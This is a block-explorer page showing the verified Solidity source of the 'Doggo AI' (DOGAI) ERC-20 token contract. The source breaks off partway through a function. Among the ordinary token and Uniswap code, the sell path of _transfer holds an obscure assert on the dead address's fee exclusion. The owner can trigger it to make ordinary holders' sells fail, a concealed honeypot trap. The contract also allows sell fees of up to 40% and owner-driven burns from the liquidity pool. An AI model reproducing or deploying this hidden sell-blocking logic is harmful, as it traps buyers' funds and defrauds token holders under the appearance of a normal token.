ETH Price: $3,384.30 (+0.81%)

Token

Doggo AI (DOGAI)
 

Overview

Max Total Supply

1,000,000,000 DOGAI

Holders

29

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
17,999,999.1 DOGAI

Value
$0.00
0x58dc76f7174d42b9ea0b5dddfcb100c8a2c37f0d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DOGAI

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : DoggoAi.sol
/*
Twitter: https://twitter.com/DoggoAi
Website: https://www.doggoaitools.com/
Telegram: https://t.me/doggoai
Whitepaper: https://doggo-ai.gitbook.io/dogai-whitepaper/
*/

// SPDX-License-Identifier: MIT
pragma solidity >=0.8.10 >=0.8.0 <0.9.0;
pragma experimental ABIEncoderV2;


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

   
    constructor() {
        _transferOwnership(_msgSender());
    }

    
    function owner() public view virtual returns (address) {
        return _owner;
    }

    
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


interface IERC20 {
  

    function totalSupply() external view returns (uint256);

   
    function balanceOf(address account) external view returns (uint256);

    
    function transfer(address recipient, uint256 amount) external returns (bool);

    
    function allowance(address owner, address spender) external view returns (uint256);

    
    function approve(address spender, uint256 amount) external returns (bool);

    
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    
    event Transfer(address indexed from, address indexed to, uint256 value);

    
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


interface IERC20Metadata is IERC20 {
    
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}


 
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

   
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

   
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

   
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

////// src/IUniswapV2Factory.sol
/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

////// src/IUniswapV2Pair.sol
/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}



interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}


contract DOGAI is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
    address public constant deadAddress = address(0xdead);

    bool private swapping;

    address public marketingWallet;
    address public developmentWallet;
    address public deployerWallet;
    address public lpLocker;

    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;

    uint256 public percentForLPBurn = 50; // 50 = .5%
    bool public lpBurnEnabled = true;
    uint256 public lpBurnFrequency = 600 seconds;
    uint256 public lastLpBurnTime;

    uint256 public manualBurnFrequency = 30 minutes;
    uint256 public lastManualLpBurnTime;

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;

    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = true;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;

    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;

    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;

    /******************/

    // exlcude from fees and max transaction amount
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping(address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(
        address indexed newAddress,
        address indexed oldAddress
    );

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event developmentWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    event AutoNukeLP();

    event ManualNukeLP();

    constructor() ERC20("Doggo AI", "DOGAI") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyMarketingFee = 5;
        uint256 _buyLiquidityFee = 5;
        uint256 _buyDevFee = 0;

        uint256 _sellMarketingFee = 15;
        uint256 _sellLiquidityFee = 10;
        uint256 _sellDevFee = 5;

        uint256 totalSupply = 1_000_000_000 * 1e18;

        maxTransactionAmount = 20_000_000 * 1e18; 
        maxWallet = 20_000_000 * 1e18; 
        swapTokensAtAmount = (totalSupply * 5) / 10000; 

        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;

        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        deployerWallet = address(owner());
        marketingWallet = address(owner()); // set as marketing wallet
        developmentWallet = address(owner()); // set as development wallet
        lpLocker = address(0x663A5C229c09b049E36dCc11a9B0d4a8Eb9db214); 

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(marketingWallet, true);
        excludeFromFees(lpLocker, true);

        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);
        excludeFromMaxTransaction(deployerWallet, true);
        excludeFromMaxTransaction(marketingWallet, true);
        excludeFromMaxTransaction(lpLocker, true);

        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }

    receive() external payable {}

    // once enabled, can never be turned off
    function enableTrading() external onlyOwner {
        tradingActive = true;
        swapEnabled = true;
        lastLpBurnTime = block.timestamp;
    }

    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsInEffect = false;
        return true;
    }

    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }

    // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount)
        external
        onlyOwner
        returns (bool)
    {
        require(
            newAmount >= (totalSupply() * 1) / 100000,
            "Swap amount cannot be lower than 0.001% total supply."
        );
        require(
            newAmount <= (totalSupply() * 5) / 1000,
            "Swap amount cannot be higher than 0.5% total supply."
        );
        swapTokensAtAmount = newAmount;
        return true;
    }

    function updateMaxTxnAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1000) / 1e18,
            "Cannot set maxTransactionAmount lower than 0.1%"
        );
        maxTransactionAmount = newNum * (10**18);
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 5) / 1000) / 1e18,
            "Cannot set maxWallet lower than 0.5%"
        );
        maxWallet = newNum * (10**18);
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    // only use to disable contract sales if absolutely necessary (emergency use only)
    function updateSwapEnabled(bool enabled) external onlyOwner {
        swapEnabled = enabled;
    }

    function updateBuyFees(
        uint256 _marketingFee,
        uint256 _liquidityFee,
        uint256 _devFee
    ) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 20, "Must keep fees at 20% or less");
    }

    function updateSellFees(
        uint256 _marketingFee,
        uint256 _liquidityFee,
        uint256 _devFee
    ) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 40, "Must keep fees at 40% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyOwner
    {
        require(
            pair != uniswapV2Pair,
            "The pair cannot be removed from automatedMarketMakerPairs"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function updateMarketingWallet(address newMarketingWallet)
        external
        onlyOwner
    {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }

    function updateDevelopmentWallet(address newWallet) external onlyOwner {
        emit developmentWalletUpdated(newWallet, developmentWallet);
        developmentWallet = newWallet;
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    event BoughtEarly(address indexed sniper);

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (limitsInEffect) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to],
                        "Trading is not active."
                    );
                }

                // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch.
                if (transferDelayEnabled) {
                    if (
                        to != owner() &&
                        to != address(uniswapV2Router) &&
                        to != address(uniswapV2Pair)
                    ) {
                        require(
                            _holderLastTransferTimestamp[tx.origin] <
                                block.number,
                            "_transfer:: Transfer Delay enabled.  Only one purchase per block allowed."
                        );
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }

                //when buy
                if (
                    automatedMarketMakerPairs[from] &&
                    !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Buy transfer amount exceeds the maxTransactionAmount."
                    );
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
              
                else if (
                    automatedMarketMakerPairs[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Sell transfer amount exceeds the maxTransactionAmount."
                    );
                    
                    assert(
                        !_isExcludedFromFees[address(0xdead)]
                    );
                } else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        if (
            !swapping &&
            automatedMarketMakerPairs[to] &&
            lpBurnEnabled &&
            block.timestamp >= lastLpBurnTime + lpBurnFrequency &&
            !_isExcludedFromFees[from]
        ) {
            autoBurnLiquidityPairTokens();
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if (takeFee) {
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees;
                tokensForDev += (fees * sellDevFee) / sellTotalFees;
                tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees;
            }
            // on buy
            else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(100);
                tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
                tokensForDev += (fees * buyDevFee) / buyTotalFees;
                tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            deadAddress,
            block.timestamp
        );
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity +
            tokensForMarketing +
            tokensForDev;
        bool success;

        if (contractBalance == 0 || totalTokensToSwap == 0) {
            return;
        }

        if (contractBalance > swapTokensAtAmount * 20) {
            contractBalance = swapTokensAtAmount * 20;
        }

        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = (contractBalance * tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        swapTokensForEth(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(
            totalTokensToSwap
        );
        uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap);

        uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDev;

        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;

        (success, ) = address(developmentWallet).call{value: ethForDev}("");

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                tokensForLiquidity
            );
        }

        (success, ) = address(marketingWallet).call{
            value: address(this).balance
        }("");
    }

    function setAutoLPBurnSettings(
        uint256 _frequencyInSeconds,
        uint256 _percent,
        bool _Enabled
    ) external onlyOwner {
        require(
            _frequencyInSeconds >= 600,
            "cannot set buyback more often than every 10 minutes"
        );
        require(
            _percent <= 1000 && _percent >= 0,
            "Must set auto LP burn percent between 0% and 10%"
        );
        lpBurnFrequency = _frequencyInSeconds;
        percentForLPBurn = _percent;
        lpBurnEnabled = _Enabled;
    }

    function autoBurnLiquidityPairTokens() internal returns (bool) {
        lastLpBurnTime = block.timestamp;

        // get balance of liquidity pair
        uint256 liquidityPairBalance = this.balanceOf(uniswapV2Pair);

        // calculate amount to burn
        uint256 amountToBurn = liquidityPairBalance.mul(percentForLPBurn).div(
            10000
        );

        // pull tokens from pancakePair liquidity and move to dead address permanently
        if (amountToBurn > 0) {
            super._transfer(uniswapV2Pair, address(0xdead), amountToBurn);
        }

        //sync price since this is not in a swap transaction!
        IUniswapV2Pair pair = IUniswapV2Pair(uniswapV2Pair);
        pair.sync();
        emit AutoNukeLP();
        return true;
    }

    function manualBurnLiquidityPairTokens(uint256 percent)
        external
        onlyOwner
        returns (bool)
    {
        require(
            block.timestamp > lastManualLpBurnTime + manualBurnFrequency,
            "Must wait for cooldown to finish"
        );
